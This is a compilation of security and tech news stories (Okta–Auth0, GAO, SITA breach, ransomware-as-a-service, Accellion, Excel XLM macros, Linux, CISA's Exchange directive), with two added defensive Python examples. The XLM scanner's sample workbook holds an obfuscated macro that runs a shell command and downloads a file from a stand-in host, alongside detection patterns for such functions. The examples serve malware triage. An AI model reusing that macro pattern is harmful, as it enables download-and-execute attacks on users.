More stories


    With its acquisition of Auth0, Okta goes all in on CIAM

    Yesterday, identity and access management (IAM) vendor Okta announced plans to acquire customer identity and access management (CIAM) vendor Auth0 for $6.5B in an all-stock transaction. Founded in 2013, Auth0 has been rapidly growing its developer-focused offering and has raised more than $330 million in venture financing. Based on Forrester’s estimates of Auth0’s annual revenue, this acquisition price is around an 80-100X revenue multiple, which is considerable and unprecedented in the IAM space. For reference, we estimated that Cisco’s acquisition of Duo in 2018 was around a 20X revenue multiple and was done as a cash transaction. With this purchase and valuation, Okta is raising its bet and going all in on CIAM. 

    In Forrester’s opinion, this high acquisition price reflects that: 
    Secure and easy-to-use digital experiences are a must going forward. Even before COVID-19 pushed many companies to all-digital customer interactions, organizations were investing heavily in building and optimizing digital experiences that provided a great user experience without sacrificing security or privacy. While companies may have previously tried this using homegrown or open-source offerings, the pace and velocity of digital transformation requires companies to evaluate turnkey CIAM solutions that can be quickly integrated into existing architectures to support these new digital experiences. This deal reflects strong overall demand for solutions such as Auth0 that help deliver on this promise, and it positions Okta to leverage that growing demand. 
    The 2020 tech stock market rally-up is an M&A accelerant. Okta’s stock has doubled in the last year as it and many other tech-related companies rode a surge in demand due to changing work conditions caused by the COVID-19 pandemic. These higher stock valuations now give public companies the ability to pursue large deals using the higher stock value. As tech stock prices continue to surge, expect more M&A and more all-stock-type transactions. 
    Okta is under pressure to cater to developers in CIAM. With digital transformation accelerating, identity has become the cornerstone of customer acquisition, management, and retention — traditionally managed by digital product teams, business units, marketing organizations, and buyers’ internal application developers. Access to these organizations’ stakeholders and decision-makers (especially to the app developers) has always been Auth0’s strength. Auth0 gives Okta better access to this developer buying center that Okta has not been as successful reaching. 
    IAM and CIAM markets remain highly competitive, with a wide range of vendors such as ForgeRock, SAP, IBM, Ping Identity, Salesforce, Microsoft, and Akamai, to name a few.  

    While Okta has built a strong leadership position in workforce IAM, the success of this merger will depend on the following: 
    How successfully Okta can further integrate Auth0 with non-IAM and non-security solutions. In CIAM, integration with analytics, business intelligence, portals, and marketing solutions are critical to keep a CIAM platform relevant. Okta will have to expand its application ecosystem quickly to remain competitive and to support these new integrations. 
    How much of a premium customers are willing to pay for identity orchestration. Auth0 had a lot of success through its freemium platform offering, which gave developers easy access to CIAM capabilities. A key factor in the financial success of the acquisition will be Okta’s ability to convert these freemium Auth0 customers into revenue-generating customers, especially when some other vendors include orchestration for free. 
    How well Okta can apply Auth0 CIAM technology to its existing workforce IAM solution. Okta’s DNA has been providing employee access to cloud apps using its cloud portal — which traditionally has required little orchestration. As Okta expands into protecting legacy on-premises apps and replacing existing on-premises solutions from Broadcom/CA, Oracle, and IBM and starts to compete more with ForgeRock and Ping Identity, Auth0’s orchestration technology will be a critical building block. 
    How well Okta will tolerate and integrate Auth0’s completely different corporate culture. Auth0’s IAM approach has been original, innovative, and technology-led. Okta’s traditional approach has been business-, execution-, and financial-results-focused. As with many similar past IAM acquisitions, the acquiring company must retain the acquired vendor’s product management and engineering team and continue to innovate — which historically has been a challenging task for many acquisitions. 
    How quickly and well Okta will eliminate overlaps to provide the best single CIAM solution. When an acquisition happens, there are usually and naturally significant overlaps between the acquiring and acquired vendors’ solutions. In this case, passwordless authentication, multifactor authentication, and even some of Okta’s preexisting developer-centric APIs overlap with Auth0’s offering. Swiftly arriving at a unified, consolidated solution to minimize customer confusion and maximize Okta’s engineering performance is critical to success. 
    This post was written by Principal Analyst Andras Cser, VP and Research Director Merritt Maxim, and Senior Analyst Sean Ryan, and it originally appeared on the Forrester blog.


    GAO report finds DOD's weapons programs lack clear cybersecurity guidelines

    In a new report released Thursday, the U.S. Government Accountability Office (GAO) said the Department of Defense fails to communicate clear cybersecurity guidelines to contractors tasked with building systems for its weapons programs. 

    As part of its so-called congressional watchdog duties, the GAO found that Defense Department weapons programs are failing to consistently incorporate cybersecurity requirements into contract language. 
    For instance, three out of five contracts reviewed by the GAO had no cybersecurity requirements written into the contract language when they were awarded, with only vague requirements added later. And out of the four military service branches, only the Air Force has a record of issuing service-wide guidance on cybersecurity requirements in contracts. 
    The GAO points out that the lack of clear cybersecurity guidance is problematic because defense contractors are only responsible for meeting terms that are written into a contract. In other words, if it’s not in the contract, it’s not getting built into the system.
    As part of its recommendations, the GAO said that tailored cybersecurity requirements must be clearly defined in acquisition program contracts. The GAO also said the Defense Department should establish criteria for accepting or rejecting contracted work and for how the government will verify that requirements were met. 
    The Defense Department has a vast network of sophisticated weapons systems that need to withstand cyberattacks in order to function when required. But the DOD also has a documented history of finding mission-critical security vulnerabilities within those programs due to what the GAO says is a lack of focus on weapon systems cybersecurity. 
    A GAO report from 2018 found that the DOD has historically focused its cybersecurity efforts on protecting networks and traditional IT systems. Since that report, the DOD has reportedly taken steps to make its network of high-tech weapon systems less vulnerable to cyberattacks.

    “As we reported in 2018, DOD had not prioritized weapon systems cybersecurity until recently, and was still determining how best to address it during the acquisition process,” the report stated. “The department had historically focused its cybersecurity efforts on protecting networks and traditional IT systems, but not weapon systems, and key acquisition and requirements policies did not focus on cybersecurity. As a result, DOD likely designed and built many systems without adequate cybersecurity.”


    Singapore Airlines frequent flyer members hit in third-party data security breach

    Data belonging to 580,000 Singapore Airlines frequent flyer members has been compromised in a cybersecurity attack that originally hit air transport communications and IT vendor SITA. The incident marks the second time in a week that an airline has reported a data breach that appears to be the result of the attack targeting SITA.
    While not a customer of SITA, Singapore Airlines (SIA) had shared a “restricted” set of data as a member of the Star Alliance group, the airline said in a statement late-Thursday. This was necessary to facilitate verification of membership tier status and provide customers of other member airlines the relevant benefits while they travelled. 
    Such data would reside on the passenger service systems of member airlines, SIA said. The national carrier did not specify when it was informed by SITA about the breach, which impacted the latter’s passenger service system servers. 

    One member of Star Alliance had used this SITA system. The international airline alliance has 26 members, including Air Canada, United Airlines, and Lufthansa. 
    Affected SIA customers were members of its KrisFlyer as well as its higher-tier PPS frequent flyer programme, the airline said, adding that compromised data was limited to the membership number and tier status, though there were some instances in which the member’s name also was illegally accessed. 
    The data leakage was relatively contained because these were the only details shared with the Star Alliance group. 
    “Specifically, this data breach does not involve KrisFlyer and PPS member passwords, credit card information, and other customer data such as itineraries, reservations, ticketing, passport numbers, and email addresses,” the Singapore carrier said. “We would also like to reassure all customers that none of SIA’s IT systems have been affected by this incident.”

    On its part, SITA released a statement on its website confirming the security breach was the result of “a highly sophisticated attack”. 
    It said it ascertained the “seriousness” of the incident on February 24, after which it took “immediate action” to inform all affected customers. Adding that it deployed “targeted” containment measures, SITA said its security incident response team was investigating the breach alongside external cybersecurity experts. 
    In an email response to ZDNet’s questions, a SITA spokesperson declined to say when the breach was first discovered internally prior to the February 24 notification, citing “tactical and security reasons”. She reiterated that investigations and forensic work were ongoing, and was unable to confirm how compromised systems were infiltrated. 
    She also would not reveal which other organisations were impacted by the breach or the types of data that were compromised, as it still was in the process of informing all affected parties. 
    She did, however, point to several airlines that already had reached out to their customers and made public statements confirming they were affected by the data breach. These included Jeju Air, Finnair, and Malaysia Airlines, she said. 
    This indicated that SITA was involved in a breach reported earlier this week that affected Malaysia Airlines’ Enrich frequent flyer members. While it had yet to make a public statement on the security incident, the airline told Enrich members it was the result of an attack that targeted a third-party IT service provider, which it did not name. 
    In its note, which offered scant details of the breach, Malaysia Airlines said compromised information had included date of birth and contact information from the period between March 2010 and June 2019. 
    In her response to ZDNet, the SITA spokesperson clarified that this timeframe referred to the date during which the compromised data was registered. It did not refer to the length of the window of compromise, which she revealed to be less than a month. 
    According to SITA, the vendor has 2,800 customers including airlines, airports, and government agencies. Pre-pandemic, 146 million passengers used its in-flight mobile service, it said. 


    Ransomware as a service is the new big problem for business

    Ransomware as a service is proving effective for cyber criminals who want a piece of the cyber-extortion action but without necessarily having the skills to develop their own malware, with two out of three attacks using this model.
    Ransomware attacks are still proving extremely lucrative, with the most well-organised gangs earning millions per victim, so many cyber criminals want to cash in – but don’t have the ability to code and distribute their own campaigns.
    That’s where ransomware as a service (RaaS) comes in, with developers selling or leasing malware to users on dark web forums. These affiliate schemes provide low-level attackers with the ability to distribute and manage ransomware campaigns, with the developer behind the ransomware receiving a cut of each ransom victim’s pay for the decryption key.
    Researchers at cybersecurity company Group-IB have detailed that almost two-thirds of ransomware attacks analysed during 2020 came from cyber criminals operating on a RaaS model.
    Such is the demand for ransomware as a service, that 15 new ransomware affiliate schemes appeared during 2020, including Thanos, Avaddon, SunCrypt, and many others.
    Competition among ransomware developers can even lead to the authors providing special deals to wannabe crooks, which is more bad news for potential victims.

    “Affiliate programs make this kind of attack more attractive for cybercriminals. The tremendous popularity of such attacks made almost every company, regardless of their size and industry, a potential victim,” Oleg Skulkin, a senior digital forensics analyst at Group-IB, told ZDNet.
    “Companies had to provide their employees with the capability to work remotely and we saw an increase in the number of publicly accessible RDP servers. Of course, nobody thought about security and many of such servers became the points of initial access for many ransomware operators,” said Skulkin.
    However, despite the success of ransomware attacks and RaaS schemes, it’s possible to help protect against falling victim to them with a handful of cybersecurity procedures – including avoiding the use of default passwords and limiting public access to RDP.
    “RDP-related compromise can easily be mitigated with the help of some simple but efficient steps like the restriction of IP addresses that can be used to make external RDP connections or setting limits on the number of login attempts within a certain period of time,” said Skulkin.
    Organisations can also help protect the network from ransomware and other attacks via the use of multi-factor authentication to limit the access an attacker can get if they do breach an account, while applying security patches as soon as possible after they’re released prevents criminals from being able to exploit known vulnerabilities.
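    The two RDP controls Skulkin describes – an allowlist of source networks and a cap on failed logons within a time window – are easy to state and easy to get wrong at the threshold. The script below, added here as an illustration and not part of Group-IB’s or ZDNet’s material, applies both rules to a set of simplified Windows Security events (constructed for this example; event 4625 is a failed logon, 4624 a successful one, and logon type 10 is RemoteInteractive, i.e. RDP). The allowlist networks, account names and IP addresses are invented; the documentation-range addresses 203.0.113.x, 198.51.100.x and 192.0.2.x stand in for external hosts.

```python
"""Triage RDP logon events against an allowlist and a failed-logon rate limit.

Constructed example: the events below are simplified (timestamp, event_id,
logon_type, account, source_ip) tuples, not real 4625/4624 records, which
carry many more fields. The logic is what matters: which sources should a
firewall allowlist have stopped, and which sources trip a lockout threshold.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
import ipaddress

# Constructed sample events (4625 = failed logon, 4624 = success, logon type 10 = RDP).
SAMPLE_EVENTS = [
    # External host hammering admin-style accounts: six failures in two minutes.
    ("2021-03-04T08:00:01", 4625, 10, "administrator", "203.0.113.7"),
    ("2021-03-04T08:00:15", 4625, 10, "administrator", "203.0.113.7"),
    ("2021-03-04T08:00:30", 4625, 10, "admin", "203.0.113.7"),
    ("2021-03-04T08:01:00", 4625, 10, "admin", "203.0.113.7"),
    ("2021-03-04T08:01:30", 4625, 10, "backup", "203.0.113.7"),
    ("2021-03-04T08:02:00", 4625, 10, "backup", "203.0.113.7"),
    # Internal user mistypes a password twice, then logs in normally.
    ("2021-03-04T08:05:00", 4625, 10, "jsmith", "10.20.30.40"),
    ("2021-03-04T08:05:20", 4625, 10, "jsmith", "10.20.30.40"),
    ("2021-03-04T08:05:45", 4624, 10, "jsmith", "10.20.30.40"),
    # Allowlisted partner network: six failures, but spread 20 minutes apart.
    ("2021-03-04T09:00:00", 4625, 10, "svc_partner", "198.51.100.20"),
    ("2021-03-04T09:20:00", 4625, 10, "svc_partner", "198.51.100.20"),
    ("2021-03-04T09:40:00", 4625, 10, "svc_partner", "198.51.100.20"),
    ("2021-03-04T10:00:00", 4625, 10, "svc_partner", "198.51.100.20"),
    ("2021-03-04T10:20:00", 4625, 10, "svc_partner", "198.51.100.20"),
    ("2021-03-04T10:40:00", 4625, 10, "svc_partner", "198.51.100.20"),
    # SMB (logon type 3) failure: not RDP, ignored by this triage.
    ("2021-03-04T11:00:00", 4625, 3, "guest", "10.9.8.7"),
    # Successful RDP logon from outside the allowlist: the firewall rule is not in place.
    ("2021-03-04T11:30:00", 4624, 10, "administrator", "192.0.2.55"),
    # Internal host spraying five accounts in five minutes: allowlisted, still a lockout.
    ("2021-03-04T12:00:00", 4625, 10, "alice", "10.50.0.9"),
    ("2021-03-04T12:01:00", 4625, 10, "bob", "10.50.0.9"),
    ("2021-03-04T12:02:00", 4625, 10, "carol", "10.50.0.9"),
    ("2021-03-04T12:03:00", 4625, 10, "dave", "10.50.0.9"),
    ("2021-03-04T12:04:00", 4625, 10, "erin", "10.50.0.9"),
]

# Assumed allowlist: the corporate LAN and one partner network may reach RDP.
ALLOWED_SOURCES = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("198.51.100.0/24")]


def is_allowed(ip, allowed=ALLOWED_SOURCES):
    """True if the source address falls inside one of the allowlisted networks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in allowed)


def failed_rdp_bursts(events, threshold=5, window=timedelta(minutes=10)):
    """Map source IP -> timestamp at which it first reached `threshold` failed
    RDP logons inside a sliding `window`. Only 4625 events with logon type 10 count."""
    recent = defaultdict(deque)
    flagged = {}
    for ts, event_id, logon_type, _account, src in sorted(events):
        if event_id != 4625 or logon_type != 10:
            continue
        now = datetime.fromisoformat(ts)
        q = recent[src]
        q.append(now)
        while q and now - q[0] > window:  # drop failures that fell out of the window
            q.popleft()
        if len(q) >= threshold and src not in flagged:
            flagged[src] = ts
    return flagged


def triage(events, allowed=ALLOWED_SOURCES, threshold=5, window=timedelta(minutes=10)):
    """One verdict per RDP source: denied by allowlist, lockout, or ok.
    A source outside the allowlist is denied regardless of outcome; a successful
    4624 from such a source means the network restriction is not actually enforced."""
    bursts = failed_rdp_bursts(events, threshold, window)
    verdicts = {}
    for _ts, _event_id, logon_type, _account, src in events:
        if logon_type != 10 or src in verdicts:
            continue
        if not is_allowed(src, allowed):
            verdicts[src] = "deny: source not in RDP allowlist"
        elif src in bursts:
            verdicts[src] = f"lockout: {threshold} failed logons within {window} (first at {bursts[src]})"
        else:
            verdicts[src] = "ok"
    return verdicts


if __name__ == "__main__":
    for src, verdict in triage(SAMPLE_EVENTS).items():
        print(f"{src:15} {verdict}")
```

    Two details matter in practice. The partner host with six failures spread over two hours never trips the limit, which is the intended behaviour of a windowed threshold rather than a lifetime counter; and the successful logon from 192.0.2.55 is reported as a deny even though it succeeded, because a 4624 from a non-allowlisted source is direct evidence that the IP restriction is missing on the perimeter.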
    All of this can help prevent organisations from falling victim to ransomware attacks in the first place – and cut off the need to pay ransoms and encourage ransomware schemes.
    “As long as companies pay ransoms, determined only by attackers’ appetite, such attacks will continue to grow in numbers and scale and are likely to become more sophisticated,” Skulkin concluded.


    Accellion zero-day claims a new victim in cybersecurity company Qualys

    Qualys has revealed that a “limited” number of customers may have been impacted by a data breach connected to an Accellion zero-day vulnerability.

    The cloud security and compliance firm said on Wednesday that the security incident did not have any “operational impact,” but “unauthorized access” had been obtained to an Accellion FTA server used by the company. 
    Accellion File Transfer Appliance (FTA) is enterprise-grade software used for file transfers. In December 2020, FireEye’s Mandiant discovered that the Clop ransomware group was exploiting previously-unknown vulnerabilities in the legacy software to extort organizations, threatening to leak sensitive data stolen from vulnerable servers unless a ransom was paid. 
    Organizations across the US, Singapore, Canada, and the Netherlands were targeted. However, according to Mandiant, ransomware was not deployed in this wave of attacks. 
    Qualys is a user of Accellion FTA. The company says that the software was used “to transfer information as part of our customer support system [in] a segregated DMZ environment” but was kept separate from production environments, codebases, and Qualys Cloud. 
    A hotfix to patch the vulnerabilities was issued by Accellion on December 21, and Qualys says that its team applied the fix on December 22. 
    However, a zero-day vulnerability in the third-party software had already been exploited, and on December 24, the company received an “integrity alert” indicating a potential compromise. 

    The impacted server was isolated from its network and an investigation was launched. Qualys found that some customer data contained in the server had been accessed, although the company has not revealed how many customers are involved, or what information was stored. 
    Qualys has hired Mandiant, which is also working with Accellion, to investigate. In addition, affected servers have been closed down and alternatives are being offered to customers. 
    “As a security company, we continue to look for ways to enhance security and provide the strongest protections for our customers,” the company says. “Qualys is strongly committed to the security of its customers and their data, and we will notify them should relevant information become available.”
    Accellion says it has worked “around the clock to develop and release patches that resolve each identified FTA vulnerability and support our customers affected by this incident.”
    Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0


    Microsoft: We're cracking down on Excel macro malware

    Macro malware has been a popular choice for hackers since the 1990s and even in recent years the technique has continued to be a simple way of delivering malware to the unwary. 
    Just last month, Ukraine accused Russian government spies of uploading documents with malicious macros to a Ukrainian government document-sharing site. And amid the first wave of the COVID-19 pandemic, Microsoft warned of emails containing Excel files with malicious macros. 
    Microsoft has been using an integration between its Antimalware Scan Interface (AMSI) and Office 365 to knock out macro malware for years, but its successful efforts to take out macro scripts written in Visual Basic for Applications (VBA) ended up pushing attackers to an older macro language called XLM, which came with Excel 4.0 in 1992.  
    Now Microsoft is expanding the integration of its AMSI with Office 365 to include the scanning of Excel 4.0 XLM macros at runtime, bringing AMSI in line with VBA.
    AMSI allows applications to integrate with any antivirus on a Windows machine to enable the antivirus to detect and block a range of malicious scripts in Office documents. Microsoft notes its Defender anti-malware is using this integration to detect and block XLM-based malware and is encouraging other anti-malware providers to adopt it, too. 
    Although XLM was superseded by VBA in 1993, XLM is still used by some customers and so it remains supported in Excel.  

    “While more rudimentary than VBA, XLM is powerful enough to provide interoperability with the operating system, and many organizations and users continue to use its functionality for legitimate purposes. Cybercriminals know this, and they have been abusing XLM macros, increasingly more frequently, to call Win32 APIs and run shell commands,” explain Microsoft’s security teams. 
    The arrival of AMSI’s VBA runtime scan in 2018 “effectively removed the armor that macro-obfuscation equipped malware with, exposing malicious code to improved levels of scrutiny,” says Microsoft. 
    “Naturally, threat actors like those behind Trickbot, Zloader, and Ursnif have looked elsewhere for features to abuse and operate under the radar of security solutions, and they found a suitable alternative in XLM,” it continues. 
    If the antivirus detects a malicious XLM macro, the macro won’t execute and Excel is terminated, thus blocking the attack. 
    Runtime inspection of XLM macros is now available in Microsoft Excel and is enabled by default on the February Current Channel and Monthly Enterprise Channel for Microsoft 365 subscription users.
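    AMSI sees XLM at runtime, after any string-building has happened. For analysts triaging a suspicious spreadsheet without executing it, the static tells Microsoft alludes to are still useful: an Auto_Open defined name, a hidden or “very hidden” macro sheet, the small set of XLM functions that reach the operating system (EXEC, CALL, REGISTER, FORMULA and friends), and the CHAR()-concatenation trick that keeps those names out of a plain string search. The script below is an added example, not Microsoft’s code or any shipping tool; the “workbook” is a hand-built dict standing in for parsed sheets, formulas and defined names (reading a real .xls or .xlsm needs a BIFF/OOXML parser such as oletools, which is out of scope here), and the URL, account and file names in it are invented.

```python
"""Static triage of Excel 4.0 (XLM) macro formulas.

Constructed example: SAMPLE_WORKBOOK is a plain dict that mimics what a
BIFF/OOXML parser would yield (sheet visibility, cell formulas, defined
names). The scanner flags the features XLM malware relies on and undoes
the simplest obfuscation, CHAR()-concatenation of function names.
"""
import re

# XLM functions that reach outside the workbook: run programs, call Win32 APIs,
# write formulas into cells at runtime, or touch the file system.
OS_REACHING_FUNCS = ("EXEC", "CALL", "REGISTER", "FORMULA", "FORMULA.FILL",
                     "RUN", "FOPEN", "FWRITE", "FREAD")
FUNC_RE = re.compile(r"(?<![A-Z.])(" + "|".join(re.escape(f) for f in OS_REACHING_FUNCS) + r")\(", re.I)
CHAR_RE = re.compile(r"CHAR\((\d+)\)", re.I)
URL_RE = re.compile(r'https?://[^"\s]+', re.I)
# Defined names Excel runs automatically when the workbook is opened/closed.
AUTO_NAMES = ("AUTO_OPEN", "AUTO_CLOSE", "AUTO_ACTIVATE", "AUTO_DEACTIVATE")

# Constructed workbook: a benign visible sheet plus a very hidden macro sheet.
SAMPLE_WORKBOOK = {
    "sheets": {
        "Sheet1": {"state": "visible", "cells": {"A1": "Quarterly figures", "B1": 1234}},
        "Macro1": {
            "state": "veryhidden",
            "cells": {
                # Builds the string "EXEC" one character at a time.
                "A1": "=CHAR(69)&CHAR(88)&CHAR(69)&CHAR(67)",
                # Writes =EXEC("cmd.exe /c calc.exe") into B1 at runtime, then runs on.
                "A2": '=FORMULA(A1&"(""cmd.exe /c calc.exe"")",B1)',
                # Win32 download via CALL; URL and paths are invented.
                "A3": '=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,'
                      '"http://example.invalid/x.dat","C:\\Users\\Public\\x.dat",0,0)',
                "A4": "=HALT()",
            },
        },
    },
    "defined_names": {"Auto_Open": "Macro1!$A$1"},
}


def decode_char_concat(formula):
    """If the formula is purely CHAR(n) and string literals joined with '&',
    return the string it builds; otherwise None. Splitting on '&' is a
    deliberate simplification: a literal containing '&' would defeat it."""
    parts = [p.strip() for p in formula.lstrip("=").split("&")]
    out = []
    for part in parts:
        m = CHAR_RE.fullmatch(part)
        if m:
            out.append(chr(int(m.group(1))))
        elif len(part) >= 2 and part[0] == '"' and part[-1] == '"':
            out.append(part[1:-1].replace('""', '"'))  # Excel doubles quotes inside strings
        else:
            return None
    return "".join(out)


def scan_formula(cell, formula):
    """Findings for one cell: OS-reaching calls, decoded CHAR() strings, embedded URLs."""
    findings = []
    if not isinstance(formula, str) or not formula.startswith("="):
        return findings
    for m in FUNC_RE.finditer(formula):
        findings.append(f"{cell}: calls {m.group(1).upper()}")
    decoded = decode_char_concat(formula)
    if decoded is not None and CHAR_RE.search(formula):
        findings.append(f"{cell}: CHAR() concatenation decodes to {decoded!r}")
    for m in URL_RE.finditer(formula):
        findings.append(f"{cell}: embeds URL {m.group(0)}")
    return findings


def triage_workbook(wb):
    """Workbook-level findings: auto-run names, non-visible sheets, then per-cell findings."""
    findings = []
    for name, target in wb.get("defined_names", {}).items():
        if name.upper() in AUTO_NAMES:
            findings.append(f"defined name {name} auto-runs {target}")
    for sheet, data in wb["sheets"].items():
        if data["state"] != "visible":
            findings.append(f"sheet {sheet} has state {data['state']}")
        for cell, formula in data["cells"].items():
            findings.extend(scan_formula(f"{sheet}!{cell}", formula))
    return findings


if __name__ == "__main__":
    for line in triage_workbook(SAMPLE_WORKBOOK):
        print(line)
```

    The decode step is the interesting part: a keyword search for EXEC finds nothing in cell A1, but reconstructing the concatenation does, and the FORMULA call in A2 is the tell that the decoded string will be written into a cell and executed. Anything more elaborate than CHAR() chains (arithmetic on cell values, MID() over a long blob) pushes static analysis toward emulation, which is exactly the gap runtime AMSI scanning closes.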


    Linux distributions: All the talent and hard work that goes into building a good one

    I regularly read the Linux Mint Blog, not only because it is useful to keep up with what is happening with the Linux Mint distribution but also because it occasionally gives very interesting insights into the development and maintenance of a Linux distribution in general, and the Linux Mint distribution(s) in particular.  
    To be honest, I was disappointed some years ago when Clem (Clement Lefebvre) discontinued his Segfault blog, because it always contained good technical information and interesting insights.
    Anyway, two recent posts to the Mint Blog are very good examples of the kind of thing I am talking about. The first, titled Update Your Computer!, is a discussion of the importance of installing updates, but in my opinion it is one of the best posts I have read in quite some time, because it is not just the usual “security updates are important/easy/safe” sermon, it also includes examples and statistics taken from the Mint distribution itself, and it examines some of the issues around running end-of-life versions that generally don’t get any updates at all.
    The Linux Mint Update utility is one of the best available in my opinion, and it is obvious that the Mint developers have put a lot of effort into it over many years, continuously improving and extending it. It not only does the basic job of downloading and installing updates, it puts a lot of effort into making the update process clear and easier to understand and manage, and monitoring various aspects of the system to try to help with effective and secure administration. I am old and stubborn, and I still tend to use CLI utilities for updates on most systems (apt on Debian and derivatives, dnf on Fedora, pacman on Arch and derivatives), but I realized quite some time ago that Mint Update did a better job overall than I could do manually.
    I strongly recommend reading this blog post, and not only for those who actually run or manage Linux Mint systems. There is a lot of food for thought – and reasons for action – in it.
    The other Mint Blog post was the regular Monthly News – February 2021. It discusses some of the upcoming improvements in the Mint Update Manager, again including not only the “what” but also the “why” behind them. It also goes into more detail about some of the most recent bug fixes, with a lot more information about the cause and effect of a few of them. For example, I mentioned the UsrMerge update in my recent post about Linux Mint 20.1; this blog post explains a rather nasty bug relating to reproducible builds that was caused by that change. 

    Reading those blog posts, and thinking about the issues that they bring up and the actions they have produced, got me thinking about Linux distributions in general. Mint is based on Ubuntu (I know, don’t worry about LMDE for this discussion), which in turn is itself based on Debian GNU/Linux. 
    That means a lot of the low-level stuff, such as the package base, the repositories, and most of the integration and compilation issues, are handled by those “upstream” distributions. The Mint developers concentrate on integration of other packages from other sources that are not included in the upstream base distribution, such as non-FOSS or other third-party packages, and the Mint development team actually produces significant new portions of the distribution, such as the Cinnamon desktop, the Mint Update Manager, and XApps to name just a few. That requires a lot of human resources – just take a look at the Linux Mint Teams page, where it lists five teams responsible for various aspects of the distribution.
    While other distributions, which are derived from larger upstream distributions, such as the numerous Ubuntu derivatives, or Arch Linux derivatives, or even others derived directly from Debian, generally do a lot less original development, they are still able to concentrate their efforts on things like desktop integration, artwork and third-party package integration, while building on the solid and (hopefully) stable foundation of their upstream distribution.
    On the other hand, my last couple of posts were about “independent” Linux distributions (such as Solus and KaOS), which are not based on or derived from any other distribution. 
    They take on the responsibility of creating the entire distribution from scratch – compiling, packaging, integrating, creating and maintaining repositories and much more. There are decisions to be made about package format, software update mechanisms, desktop(s) to be supported, and on and on. That in itself requires a lot of work, and a lot of technical expertise and experience.
    So what does all of this mean to someone who is trying to decide on a Linux distribution to use, or at least to try out?  
    Well, at one end of the scale the large, established distributions such as Debian, Fedora, openSUSE and their major derivatives, such as Linux Mint, offer stability, predictability and very extensive testing before release (note that I omitted Ubuntu here, because in my opinion they lose out on predictability due to their very serious ‘not invented here’ syndrome, and their tendency over the years to unnecessarily reinvent things and go wandering off on a long tangent before suddenly deciding to scrap it and jump back onto the mainstream path after all). End-user support from these distributions is likely to be good, but rather slow-moving from the user perspective.
    At the other end of the scale, the independent distributions such as Solus, KaOS and PCLinuxOS are generally more focused on their original concept, which might be a specific desktop/development environment, or a specific target audience or application. If that focus matches your interest, then you are likely to feel much closer to the developers, rather than feeling like you are “just one of the potentially large number of users”. Because of the smaller size of the development/maintenance team, independent distributions are likely to be more “agile”, getting updates and new developments integrated and released faster, and end-user support is generally more responsive and often more personal.
    In closing, I would say that I admire a lot of the people at both ends of this scale. It takes a great deal of talent, knowledge, dedication and plain old hard work to produce a good Linux distribution. 
    Clem, in particular, has been one of my heroes for a very long time (since about release 2.something), and Adam W. since the Mandriva days. Those who have established and maintained independent distributions for years are deserving of just as much credit and appreciation, but they often don’t get it.  
    Kudos to them.


    CISA issues emergency directive to agencies: Deal with Microsoft Exchange zero-days now

    The US Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive following the release of fixes for zero-day vulnerabilities in Microsoft Exchange. 
    The US agency’s Emergency Directive 21-02, “Mitigate Microsoft Exchange On-Premises Product Vulnerabilities,” was issued on March 3. 
    This week, Microsoft warned that four zero-day vulnerabilities in Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019 are being actively exploited by a suspected state-sponsored advanced persistent threat (APT) group from China called Hafnium. 
    Exchange Online is not affected by the bugs. However, Exchange Server is software used by government agencies and the enterprise alike, and so Microsoft’s warning to apply provided patches immediately should not be ignored. 
    In light of this, CISA’s directive — made through legal provisions for the agency to issue emergency orders to other US government bodies when serious cybersecurity threats are detected — demands that federal agencies tackle the vulnerabilities now. 
    CISA says that partner organizations have detected “active exploitation of vulnerabilities in Microsoft Exchange on-premise products.”
    “Successful exploitation of these vulnerabilities allows an attacker to access on-premises Exchange Servers, enabling them to gain persistent system access and control of an enterprise network,” the agency says. 

    CISA believes the vulnerabilities present an “unacceptable risk to Federal Civilian Executive Branch agencies,” and so action is now required. 
    The emergency directive has stipulated that agencies must begin triaging their network activity, system memory, logs, Windows event logs, and registry records to find any indicators of suspicious behavior. 
    If there are no indicators of compromise (IoCs), patches need to be immediately applied to Microsoft Exchange builds. However, if any activity is of note, US departments must immediately disconnect their Microsoft Exchange on-premises servers and report their findings to CISA for further investigation.
    “This Emergency Directive remains in effect until all agencies operating Microsoft Exchange servers have applied the available patch or the Directive is terminated through other appropriate action,” the agency added. 
